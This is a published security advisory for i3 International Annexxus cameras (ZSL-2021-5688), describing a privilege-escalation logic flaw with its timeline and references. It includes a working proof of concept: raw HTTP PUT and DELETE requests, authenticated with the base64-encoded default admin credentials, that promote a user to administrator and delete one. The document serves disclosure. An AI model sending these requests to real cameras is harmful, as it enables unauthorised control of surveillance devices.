CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
45.4%
Title: i3 International Annexxus Cameras Ax-n 5.2.0 Application Logic Flaw
Advisory ID: ZSL-2021-5688
Type: Local/Remote
Impact: Logic Flaw
Risk: (1/5)
Release Date: 01.11.2021
The Annexxus camera 6MP provides 4 simultaneous, independently controlled digital pan-tilt-zoom (ePTZ) video streams, which may be recorded or viewed live as well as a built-in microphone and speaker allowing two way communication.
The application doesn’t allow creation of more than one administrator account on the system. This also applies for deletion of the administrative account. The logic behind this restriction can be bypassed by parameter manipulation using dangerous verbs like PUT and DELETE and improper server-side validation. Once a normal account with ‘viewer’ or ‘operator’ permissions has been added by the default admin user ‘i3admin’, a PUT request can be issued calling the ‘UserPermission’ endpoint with the ID of created account and set it to ‘admin’ userType, successfully adding a second administrative account.
i3 International Inc. - <https://www.i3international.com>
V5.2.0 build 150317 (Ax46)
V5.0.9 build 151106 (Ax68)
V5.0.9 build 150615 (Ax78)
App-webs/
[27.10.2021] Vulnerability discovered.
[27.10.2021] Vendor contacted.
[31.10.2021] No response from the vendor.
[01.11.2021] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.exploit-db.com/exploits/50473>
[2] <https://packetstormsecurity.com/files/164752/>
[3] <https://cxsecurity.com/issue/WLB-2021110012>
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/212660>
[5] <https://vulners.com/cve/CVE-2021-43442>
[01.11.2021] - Initial release
[02.11.2021] - Added reference [1], [2] and [3]
[03.11.2021] - Added reference [4]
[11.04.2022] - Added reference [5]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>i3 International Annexxus Cameras Ax-n 5.2.0 Application Logic Flaw
Vendor: i3 International Inc.
Product web page: https://www.i3international.com
Affected version: V5.2.0 build 150317 (Ax46)
V5.0.9 build 151106 (Ax68)
V5.0.9 build 150615 (Ax78)
Summary: The Annexxus camera 6MP provides 4 simultaneous,
independently controlled digital pan-tilt-zoom (ePTZ) video
streams, which may be recorded or viewed live as well as a
built-in microphone and speaker allowing two way communication.
Desc: The application doesn't allow creation of more than one
administrator account on the system. This also applies for
deletion of the administrative account. The logic behind this
restriction can be bypassed by parameter manipulation using
dangerous verbs like PUT and DELETE and improper server-side
validation. Once a normal account with 'viewer' or 'operator'
permissions has been added by the default admin user 'i3admin',
a PUT request can be issued calling the 'UserPermission' endpoint
with the ID of created account and set it to 'admin' userType,
successfully adding a second administrative account.
Tested on: App-webs/
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5688
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5688.php
27.10.2021
--
Make user ID 3 an Administrator:
--------------------------------
PUT /PSIA/Custom/SelfExt/UserPermission/3 HTTP/1.1
Host: 192.168.1.1
Content-Length: 556
Cache-Control: max-age=0
Accept: */*
X-Requested-With: XMLHttpRequest
If-Modified-Since: 0
Authorization: Basic aTNhZG1pbjppM2FkbWlu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.1.1
Referer: http://192.168.1.1/doc/setup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin
Connection: close
<?xml version='1.0' encoding='utf-8'?><userpermission><id>3</id><userid>3</userid><usertype>admin</usertype><remotepermission><playback>true</playback><preview>true</preview><record>true</record><ptzcontrol>true</ptzcontrol><upgrade>true</upgrade><parameterconfig>true</parameterconfig><restartorshutdown>true</restartorshutdown><logorstatecheck>true</logorstatecheck><voicetalk>true</voicetalk><transparentchannel>true</transparentchannel><contorllocalout>true</contorllocalout><alarmoutorupload>true</alarmoutorupload></remotepermission></userpermission>
HTTP/1.1 200 OK
Date: Wed, 27 Oct 2021 14:13:56 GMT
Server: App-webs/
Connection: close
Content-Length: 238
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<responsestatus version="1.0" xmlns="urn:psialliance-org">
<requesturl>/PSIA/Custom/SelfExt/UserPermission/3</requesturl>
<statuscode>1</statuscode>
<statusstring>OK</statusstring>
</responsestatus>
Delete Administrator user ID 3:
-------------------------------
DELETE /PSIA/Security/AAA/users/3 HTTP/1.1
Host: 192.168.1.1
Cache-Control: max-age=0
Accept: */*
X-Requested-With: XMLHttpRequest
If-Modified-Since: 0
Authorization: Basic aTNhZG1pbjppM2FkbWlu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Origin: http://192.168.1.1
Referer: http://192.168.1.1/doc/setup.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: i3userInfo80=aTNhZG1pbjppM2FkbWlu; i3userName80=i3admin
Connection: close
HTTP/1.1 200 OK
Date: Wed, 27 Oct 2021 14:20:17 GMT
Server: App-webs/
Connection: close
Content-Length: 213
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<responsestatus version="1.0" xmlns="urn:psialliance-org">
<requesturl>/PSIA/Security/AAA/users/3</requesturl>
<statuscode>1</statuscode>
<statusstring>OK</statusstring>
</responsestatus>
</p></body></html>
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
45.4%